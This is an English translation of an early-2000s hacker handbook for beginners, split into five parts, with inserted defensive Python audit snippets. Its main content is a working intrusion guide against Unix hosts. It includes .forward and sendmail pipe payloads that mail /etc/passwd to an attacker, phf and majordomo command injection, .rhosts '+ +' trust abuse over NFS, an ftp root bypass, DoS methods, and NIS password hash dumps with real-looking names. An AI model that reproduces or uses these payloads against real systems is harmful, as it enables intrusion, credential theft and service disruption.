samsa's Hacker Handbook, suitable for beginners (1)
(2001-12-02 06:13) 
samsa
[Abstract] Breaking into a system takes many steps; it is highly staged "work" whose final goal is superuser privilege, that is, absolute control over the target system. Starting from knowing nothing about the system, we use the network services it offers to gather information about it, and that information exposes the system's security weaknesses or potential entry points. We then exploit flaws inherent in those network services, or flaws in their configuration, to try to retrieve important information from the target (such as the password file) or to run commands on it; by these means we may obtain an ordinary shell on the system. Next, we use flaws in the target's local operating system or applications to try to raise our privileges on that system and seize superuser control. Suitable clean-up afterwards includes hiding one's identity, removing traces, planting Trojan horses and leaving back doors.
(0) Choosing the target
(1) Starting from nothing (information gathering)
Starting from knowing nothing at all:
...
What to look at:
(samsa: [/f] matters most!!)
[numen]
Login Name TTY Idle When Where
root Super-User console 1 Fri 10:03 :0
root Super-User pts/6 6 Fri 12:56 192.168.0.116
root Super-User pts/7 Fri 10:11 zw
root Super-User pts/8 1 Fri 10:04 :0.0
root Super-User pts/1 4 Fri 10:08 :0.0
root Super-User pts/11 3:16 Fri 09:53 192.168.0.114
root Super-User pts/10 Fri 13:08 192.168.0.116
root Super-User pts/12 1 Fri 10:13 :0.0
(samsa: with this many root sessions, one is not easily noticed~)
[victim]
Login Name TTY Idle When Where
ylx ??? pts/9 192.168.0.79
[numen]
Login Name TTY Idle When Where
root Super-User console 7 Fri 10:03 :0
root Super-User pts/6 11 Fri 12:56 192.168.0.116
root Super-User pts/7 Fri 10:11 zw
root Super-User pts/11 3:21 Fri 09:53 192.16 numen:
ts/10 May 7 13:08 18 (192.168.0.116)
(samsa: if there is no finger, you can only make do with rusers)
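As an added example (not from samsa's handbook), the check a defender would run against this kind of `finger` listing: it flags root sessions whose origin is a network address rather than the console or the local X display. The sample lines are constructed after the [numen] output above.

```python
# Added example (not part of samsa's handbook): flag root sessions that arrive
# from the network in Solaris-style `finger` output. The sample is constructed
# from the [numen] listing; column positions vary because the Idle field is
# sometimes blank, so we key off the first, third and last fields only.
FINGER_SAMPLE = """\
Login Name TTY Idle When Where
root Super-User console 1 Fri 10:03 :0
root Super-User pts/6 6 Fri 12:56 192.168.0.116
root Super-User pts/7 Fri 10:11 zw
root Super-User pts/8 1 Fri 10:04 :0.0
root Super-User pts/11 3:16 Fri 09:53 192.168.0.114
ylx ??? pts/9 192.168.0.79
"""


def is_local(where):
    """The console and X displays on the same host (':0', ':0.0') count as local."""
    return where == "console" or where.startswith(":")


def remote_root_sessions(text):
    """Return (tty, origin) for every root session whose origin is not local."""
    hits = []
    for line in text.splitlines()[1:]:  # first line is the column header
        fields = line.split()
        if len(fields) < 3:
            continue
        login, tty, where = fields[0], fields[2], fields[-1]
        if login == "root" and not is_local(where):
            hits.append((tty, where))
    return hits


def remote_root_origins(text):
    """Distinct hosts/addresses from which root is logged in."""
    return sorted({where for _, where in remote_root_sessions(text)})
```

Each entry returned is a session worth explaining: root should normally appear only on the console, and every remote origin is a host to check for a compromised account or a stolen password.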
export table of numen:
/space/users/lpf sun9
samsa:/space/users/lpf
sun9:/space/users/lpf
(samsa: which directories this machine exports, and to whom [/etc/dfs/dfstab])
program vers proto port service
(samsa: [/etc/rpc] a pity rexd is not running; they say an open rexd is as good as no password at all!
Still, there are rstat, rusers, mount and nfs :-)
access control disabled, clients can connect from any host
(samsa: great!!!)
xwininfo: Window id: 0x25 (the root window) (has no name)
Absolute upper-left X: 0
Absolute upper-left Y: 0
Relative upper-left X: 0
Relative upper-left Y: 0
Width: 1152
Height: 900
Depth: 24
Visual Class: TrueColor
Border width: 0
Class: InputOutput
Colormap: 0x21 (installed)
Bit Gravity State: ForgetGravity
Window Gravity State: NorthWestGravity
Backing Store State: NotUseful
Save Under State: no
Map State: IsViewable
Override Redirect State: no
Corners: +0+0 -0+0 -0-0 +0-0
-geometry 1152x900+0+0
(samsa:can't be greater!!!!!!!!!!!)
Trying 192.168.
Connected to numen.
Escape character is '^]'.
(CST)
expn root
vrfy ylx
expn ftp
(samsa: ftp expanding means there is anonymous ftp)
(samsa: without finger and rusers, this is the only way left: guessing user names one at a time)
debug
wiz
(samsa: where would these famous holes still be found today? :-( )
...
(samsa: satan has a graphical interface, so it cannot be shown here!!
List the victim's system type (e.g. SunOS 5.7), the services it offers (e.g. WWW) and the weaknesses present)
samsa's Hacker Handbook, suitable for beginners (2)
(2001-12-02 06:13)
2. Striking the ox from behind the mountain (remote attacks)
tftp> get /etc/passwd
Error code 2: Access violation
tftp> get /etc/shadow
Error code 2: Access violation
tftp> quit
(samsa: nothing gained, but...)
tftp> get /etc/passwd
Received 965 bytes in 0.1 seconds
tftp> get /etc/shadow
Error code 2: Access violation
(samsa: success!!! ;-)
root:x:0:0:Super-User:/:/bin/ksh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:/bin/sh
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
ylx:x:10007:10::/users/ylx:/bin/sh
wzhou:x:10020:10::/users/wzhou:/bin/sh
wzhang:x:10101:4:Walt Whiteman:/users/wzhang:/sbin/sh
(samsa: a pity it has been shadowed :-/)
Connected to sun8.
Name (sun8:root): anonymous
Password:
(samsa: your e-mail address; a fake one, of course :->)
ftp> ls
bin
dev
etc
incoming
pub
usr
ftp> cd etc
ftp> ls
group
passwd
ftp> get passwd
local: passwd remote: passwd
root:x:0:0:Super-User:/:/bin/ksh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:/bin/sh
adm:x:4:4:Admin:/var/adm:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nobody:x:60001:60001:Nobody:/:
ftp:x:210:12::/export/ftp:/bin/false
(samsa: normal! fools who leave the complete passwd in the anonymous ftp directory are too rare)
"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr"
Connected to victim
Name (victim:zen): ftp
Password:[your e-mail address:forged]
ftp> put forward_sucker_file .forward
ftp> quit
(samsa: now wait for the passwd file to arrive by mail...)
The famous big CGI bugs
silly/cgi-bin/nph-test-cgi?*
silly/cgi-bin/phf?Qalias=x
less /etc/passwd
silly.edu/cgi-bin/campus?
/bin/cat
/etc/passwd
/bin/cat
/etc/passwd
silly/cgi-bin/aglimpse/80|IFS=5;CMD=5mail5me\mailto:@my.e-mail.
addr\
(samsa: the line was too long, so I folded it; no harm done, right? ;-)
export list for numen:
/space/users/lpf sun9
/space/users/zw (everyone)
drwxr-xr-x 6 1005 staff 2560 1999 5月 11 .
$ cat >.forward
"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr"
^D
(samsa: wait for your mail....)
Exploit the broadcast nature of Ethernet to eavesdrop on the IP packets passing over the network and so obtain passwords.
For the principles and technical details of sniffers, see [samsa 1999].
(samsa: not much to it; it feels somewhat like ``winning without honour''...)
nis-master # echo 'foo: "| mail me@my.e-mail.addr > /etc/aliases
nis-master # cd /var/yp
nis-master # make aliases
nis-master # echo test | mail -v foo@victim
Exploiting the majordomo (ver. 1.94.3) hole
Reply-to: a~.`/usr/bin/rcp\$me@hacker.home.edu:script\$/tmp
/script;;source\$/tmp/script`.q~a/ad=cucu/c=scapegoat\\\@his.e-mail
/bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr
Exploiting the sendmail 5.55 hole:
Connected to victim
Escape character is '^]'.
mail from: "|/bin/mail me@my.e-mail.addr
250 "|/bin/mail me@my.e-mail.addr
rcpt to: nosuchuser
data
..
quit
Connection closed by foreign host.
samsa's Hacker Handbook, suitable for beginners (3)
(2001-12-02 06:13)
2) Remote control
Send the target a large number of TCP connection requests without completing the three-way handshake the TCP protocol requires, so that the target system waits on them and burns its network resources, making its network services unavailable.
Send the target a large number of ping packets, i.e. ICMP_ECHO packets, so that the target's network interface cannot keep up.
As in 2.1.2), send a large number of UDP packets.
Send large amounts of e-mail to the other side's mailbox so that it has no room left to receive normal mail.
Send a little specially crafted data to a certain port on the target system to make it crash.
Impersonate one end of a particular network connection and send a specific packet (FIN or RST) onto the network to terminate that connection;
(samsa: saw on the net that NT also has a buggy CGI, don't know the details)
Same as 1.7, exploiting the majordomo (ver. 1.94.3) hole
It is said that if rexd is open and rpcbind is not running in secure mode, it is as good as having no password: one can run programs on the target machine remotely at will.
If xhost access control is disabled, one can remotely control that machine's display system: display on it, steal keyboard input and screen contents, and even execute remotely...
samsa's Hacker Handbook, suitable for beginners (4)
(2001-12-02 06:13)
3. Entering the hall (remote login)
The key point is obtaining a user account and its password
Use John the Ripper:
Guessing: the password equal to the user name, simple variants of the user name, the organisation's name, the machine model etc.
e.g. cxl: cxl, cxl111, cxl123, cxl12345, cxlsun,
(samsa: if there are enough users, this method is still quite effective: it takes luck and inspiration)
The key is the trust relationship, i.e. the /etc/hosts.equiv and ~/.rhosts files
If /etc/hosts.equiv contains a "+ +", then any user on any host (root excepted) can log in remotely without a password and become the user of the same name on that machine;
If the .rhosts file in some user's home directory contains a "+ +", then the user of the same name on any host can log in remotely without a password
If some user's home directory is exported:
export list for numen:
/space/users/lpf sun9
/space/users/zw (everyone)
drwxr-xr-x 6 1005 staff 2560 1999 5月 11 .
$ cat >.rhosts
^D
$ rsh numen csh -i
Warning: no access to tty; thus no job control in
numen%
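Added example (not part of the handbook) covering both trust mechanisms used in this section: it audits `.rhosts`/`hosts.equiv` content for wildcard entries and a `showmount -e`-style export list for directories exported to everyone. The sample inputs and the names `RHOSTS` and `EXPORTS` are constructed for the example.

```python
# Added example (not samsa's): audit the r-command trust files and the NFS
# export list that, combined, let anyone plant a .rhosts as shown above.
import re

# Constructed sample of a user's ~/.rhosts (comments start with '#').
RHOSTS = """\
# ~zw/.rhosts, constructed sample
sun9 zw
+ +
+@trusted lpf
-badhost
"""
# Constructed sample modelled on the numen export list in this section.
EXPORTS = """\
export list for numen:
/space/users/lpf sun9
/space/users/zw (everyone)
"""


def audit_rhosts(text, path="~/.rhosts"):
    """Flag entries that trust any host or any user.

    Format: one 'host [user]' pair per line; '+' is a wildcard, '+@grp' a
    netgroup, a leading '-' denies.  Returns a list of (path, line, reason)."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        host = parts[0]
        user = parts[1] if len(parts) > 1 else None
        if host == "+":
            findings.append((path, line, "any host trusted"))
        if user == "+":
            findings.append((path, line, "any user on that host may log in"))
        if host.startswith("+@"):
            findings.append((path, line, "netgroup trust, check netgroup members"))
    return findings


def audit_exports(text):
    """Return exported paths open to every client in showmount -e style output."""
    open_exports = []
    for line in text.splitlines():
        m = re.match(r"^(\S+)\s+(.*)$", line)
        if m and ("(everyone)" in m.group(2) or m.group(2).strip() == "*"):
            open_exports.append(m.group(1))
    return open_exports
```

A home directory that appears in `audit_exports` output deserves the same attention as a `+ +` finding, since a writable export of a home directory is enough to create the `.rhosts` entry.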
Using the ``decode'' alias
a) If any user's home directory (e.g. /home/zen) or the .rhosts under it is writable by daemon, then
(samsa: and so a "+ +" appears in /home/zen/.rhosts)
b) If no user home directory or .rhosts under it is writable by daemon, use /etc/aliases.pag,
since on many systems that file is world-writable.
bin: "| cat /etc/passwd | mail me@my.e-mail.addr"
c) The bug in sendmail before 5.59
telnet victim 25 << EOSM
rcpt to: /home/zen/.rhosts
mail from: zen
data
random garbage
..
rcpt to: /home/zen/.rhosts
mail from: zen
data
..
quit
EOSM
x.xxx
Connected to victim
Escape character is '^]'.
Connection closed by foreign host.
Welcome to victim!
$
d) A somewhat `newer' sendmail bug
Connected to victim
Escape character is '^]'.
mail from: "|echo  >> /home/zen/.rhosts"
rcpt to: nosuchuser
data
..
quit
Connection closed by foreign host.
Welcome to victim!
$
The r-commands' trust relationship is built on IP addresses, so trust can be obtained through IP spoofing;
As with telnet, the user name and password must also be obtained
ftp> open victim
Connected to victim
ftp> quote user ftp
ftp> quote cwd ~root
ftp> quote pass ftp
ftp> ls -al / (or whatever)
(samsa: you are root now)
samsa's Hacker Handbook, suitable for beginners (5)
(2001-12-02 06:12)
4. Slipping through the door
Once you have an (ordinary user) shell on the target machine, there is a lot you can do
Look at whatever you can, take whatever you can, break whatever you can
$ cat /etc/passwd
......
......
$ domainname
cas.ac
$ ypwhich -d cas.ac
$ ypcat passwd
ox% domainname
ios.ac
ox% nisls
ios.ac:
org_dir
groups_dir
ox% nisls org_dir
org_dir.ios.ac.:
passwd
group
auto_master
auto_home
bootparams
cred
ethers
hosts
mail_aliases
sendmailvars
netmasks
netgroup
networks
protocols
rpc
services
timezone
ox% _dir
root:uop5Jji7N1T56:0:1:Super-User:/:/bin/csh:9841::::::
daemon:NP:1:1::/::6445::::::
bin:NP:2:2::/usr/bin::6445::::::
sys:NP:3:3::/::6445::::::
adm:NP:4:4:Admin:/var/adm::6445::::::
lp:NP:71:8:Line Printer Admin:/usr/spool/lp::6445::::::
smtp:NP:0:0:Mail Daemon User:/::6445::::::
uucp:NP:5:5:uucp Admin:/usr/lib/uucp::6445::::::
listen:*LK*:37:4:Network Admin:/usr/net/nls::::::::
nobody:NP:60001:60001:Nobody:/::6445::::::
noaccess:NP:60002:60002:No Access User:/::6445::::::
guest:NP:14:300:Guest:/hd2/guest:/bin/csh:10658::::::
syscd:qkPu7IcquHRRY:120:10::/usr/syscd:/bin/csh:::::::
peif:DyAkTGOg/2TCY:819:800:Pei Fei:/home/peif:/bin/csh:10491::::::
lxh:T4FjqDv0LG7uM:510:500:Liu Xuehui:/home/lxh:/bin/csh:10683::::::
fjh:5yPB5xLOibHD6:507:500:Feng Jinhui:/home/fjh:/bin/csh:10540::::::
lhj:UGAVVMvjp/9UM:509:500:Li Hongju:/home/lhj:/bin/csh:10142::::::
....
(samsa: gotcha!!!)
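Added example, not samsa's: a checker for a passwd-format dump such as the tftp'd file in part 2 or the `ypcat passwd` output above. It flags non-root UID 0 accounts (the `smtp:x:0:0` entry in part 2), empty password fields, and entries whose hash is exposed rather than replaced by a placeholder like `x`, `NP` or `*LK*`. The sample lines are constructed after those listings.

```python
# Added example (not part of the handbook): audit a passwd-style dump.
# Constructed sample mixing the 7-field /etc/passwd form with the longer
# Solaris NIS form; the guest line with an empty password is invented.
PASSWD_SAMPLE = """\
root:x:0:0:Super-User:/:/bin/ksh
smtp:x:0:0:Mail Daemon User:/:
nobody:x:60001:60001:Nobody:/:
ylx:x:10007:10::/users/ylx:/bin/sh
lhj:UGAVVMvjp/9UM:509:500:Li Hongju:/home/lhj:/bin/csh:10142::::::
daemon:NP:1:1::/::6445::::::
listen:*LK*:37:4:Network Admin:/usr/net/nls::::::::
guest::14:300:Guest:/hd2/guest:/bin/csh
"""

# Password-field values that are placeholders or locks, not crackable hashes.
LOCKED = {"x", "NP", "*LK*", "*", "!"}


def audit_passwd(text):
    """Return a dict of findings keyed by check name.

    uid0: accounts other than root with UID 0 (full superuser rights)
    empty_password: accounts that need no password at all
    hash_exposed: a real hash is visible, so the map can be cracked offline
    bad_line: lines that do not parse as passwd entries"""
    findings = {"uid0": [], "empty_password": [], "hash_exposed": [], "bad_line": []}
    for line in text.splitlines():
        f = line.split(":")
        if len(f) < 7 or not f[2].isdigit():
            findings["bad_line"].append(line)
            continue
        name, pw, uid = f[0], f[1], int(f[2])
        if uid == 0 and name != "root":
            findings["uid0"].append(name)
        if pw == "":
            findings["empty_password"].append(name)
        elif pw not in LOCKED:
            findings["hash_exposed"].append(name)
    return findings
```

Any name under `hash_exposed` in a NIS map means the hash is readable by every client of that domain, which is exactly what the `ypcat passwd` above demonstrates.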
ox% uname -a
SunOS ox 5.5 Generic sun4d sparc SUNW,SPARCserver-1000
ox% id
uid=820(ywc) gid=800(ofc)
ox% hostname
ox
ox% domainname
ios.ac
ox% ifconfig -a
lo0: flags=849 mtu 8232
inet 127.0.0.1 netmask ff000000
be0: flags=863 mtu 1500
inet 159.226.5.188 netmask ffffffc0 broadcast 159.226.5.191
ipd0: flags=c0 mtu 8232
inet 0.0.0.0 netmask 0
ox% netstat -rn
Routing Table:
Destination Gateway Flags Ref Use Interface
-------------------- -------------------- ----- ----- ------ ---------
default 159.226.5.189 UG 0 1198
......
ox% cd /tmp
ox% mkdir .hide
ox% cd .hide
ox% ls -ld `find / \( \( -type d -o -type f \) -a \( -perm -0002 -o -group 800 \
-a -perm -0020 \) \) -print` >.wr
(samsa: wr=writables: writable directories and files)
ox% grep '^d' .wr > .wd
(samsa: wd=writable directories)
ox% grep '^-' .wr > .wf
(samsa: wf=writable files: regular files)
ox% ls -l `find / \( -perm -4000 -a -user root \) -print` >.sr
(samsa: sr=suid roots)
On the great majority of systems the permissions under the http root directory are set wrongly! If you don't believe it, look:
ox1% grep http /f
ox1% ps -ef | grep http
http 7538 251 0 14:02:35 ? 0:02 /opt/home1/ofc/http/httpd/httpd -f /opt/home1/ofc/http/httpd/f
http 7567 251 0 15:16:46 ? 0:01 /opt/home1/ofc/http/httpd/httpd -f /opt/home1/ofc/http/httpd/f
root 251 1 0 May 05 ? 3:27 /opt/home1/ofc/http/httpd/httpd -f /opt/home1/ofc/http/httpd/f
......
ox1% cd /opt/home1/ofc/http/httpd
ox1% ls -l |more
total 530
drwxrwxrwx 11 http ofc 512 Jan 18 13:21 English
-rw-rw-rw- 1 http ofc 8217 May 10 09:42 Welcome.html
drwxr-sr-x 2 http ofc 512 Dec 24 15:20 cgi-bin
drwxr-sr-x 2 http ofc 512 Mar 24 1997 cgi-src
drwxrwxrwx 2 http ofc 512 Jan 12 15:05 committee
drwxr-sr-x 2 root ofc 512 Jul 2 1998 conf
-rwxr-xr-x 1 http ofc 203388 Jul 2 1998 httpd
drwxrwxrwx 2 http ofc 512 Jan 12 15:06 icons
drwxrwxrwx 2 http ofc 3072 Jan 12 15:07 images
-rw-rw-rw- 1 http ofc 7532 Jan 12 15:08 index.htm
drwxrwxrwx 2 http ofc 512 Jan 12 15:07 introduction
drwxr-sr-x 2 http ofc 512 Apr 13 08:46 logs
drwxrwxrwx 2 http ofc 1024 Jan 12 17:19 research
(samsa: haha!! nearly all of it is writable, incredible; change it, what are you waiting for??)
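Added example, not from the handbook: it parses `ls -l` output such as the httpd listing above and reports world-writable entries, plus setuid-root files like those the `find` in the .sr step collects. The listing is constructed after the page's; the setuid entry is an invented name.

```python
# Added example (not samsa's): review a long listing for the two things the
# handbook hunts for, world-writable entries and setuid-root programs.
# Constructed sample based on the httpd directory listing above.
LS_SAMPLE = """\
total 530
drwxrwxrwx 11 http ofc 512 Jan 18 13:21 English
-rw-rw-rw- 1 http ofc 8217 May 10 09:42 Welcome.html
drwxr-sr-x 2 http ofc 512 Dec 24 15:20 cgi-bin
drwxr-sr-x 2 root ofc 512 Jul 2 1998 conf
-rwxr-xr-x 1 http ofc 203388 Jul 2 1998 httpd
-rwsr-xr-x 1 root sys 20480 Jul 2 1998 sample_setuid_root
"""


def parse_ls(text):
    """Yield (mode, owner, group, name) from `ls -l` lines; skips 'total' etc."""
    for line in text.splitlines():
        f = line.split(None, 8)  # the name is the 9th field and may hold spaces
        if len(f) < 9 or len(f[0]) != 10:
            continue
        yield f[0], f[2], f[3], f[8]


def world_writable(text):
    """Names whose 'other' write bit is set (mode[8] == 'w')."""
    return [name for mode, _, _, name in parse_ls(text) if mode[8] == "w"]


def setuid_root(text):
    """Regular files owned by root with the setuid bit ('s'/'S' at mode[3])."""
    return [name for mode, owner, _, name in parse_ls(text)
            if mode[0] == "-" and owner == "root" and mode[3] in "sS"]
```

In a web root, every name returned by `world_writable` is content any local user can replace, which is the situation the listing above shows.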
Making trouble with system holes
Under Solaris 2.5 (2.5.1):
$ ping -sv -i 127.0.0.1 224.0.0.1
PING 224.